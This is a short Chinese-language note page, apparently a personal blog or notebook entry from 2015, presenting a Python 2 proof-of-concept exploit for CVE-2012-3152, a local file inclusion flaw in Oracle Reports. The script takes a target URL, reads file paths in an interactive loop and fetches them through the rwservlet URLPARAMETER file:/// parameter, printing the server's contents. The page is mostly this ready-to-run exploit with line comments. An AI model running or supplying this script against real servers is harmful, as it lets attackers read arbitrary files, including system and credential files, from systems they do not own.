[关闭]
@ty4z2008 2015-07-31T00:58:08.000000Z 字数 734 阅读 1831

CVE-2012-3152


这一小段代码是演示的CVE-2012-3152 Oracle本地文件包含的漏洞利用PoC,与前一个PoC示例有点类似,也是通过循环可以无限输入需要访问文件目录。对于下面这一段脚本无前面有点不同。增加了一点交互性的东西。通过termcolor模块来实现:

  1. #!/usr/bin/python
  2. import sys, urllib2 # 导入需要的包
  3. from termcolor import colored # 这里需要下载"termcolor"模块
  4. if len(sys.argv) != 2: # 检查输入的格式是否正确"<script> <URL>"
  5. print "Usage: "+sys.argv[0]+" <URL>"
  6. sys.exit(0)
  7. URL=sys.argv[1] # 输出测试的URL
  8. print "[+] Attempting CVE-2012-3152 - Oracle Reports LFI"
  9. while True: # 循环开始时先输出 "~$ " 然后通过"raw_input"获取要执行的命令
  10. resource=raw_input(colored("~$ ", "red"))
  11. req = '/reports/rwservlet?report=test.rdf+desformat=html+destype=cache+JOBTYPE=rwurl+URLPARAMETER="file:///'+resource+'"'
  12. try: # 使用Try/Except处理响应信息
  13. response=urllib2.urlopen(URL+req)
  14. # 发起请求并且显示响应内容
  15. for line in response.readlines():
  16. print line.strip()
  17. except Exception as e: print e

oracle

添加新批注
在作者公开此批注前,只有你和作者可见。
回复批注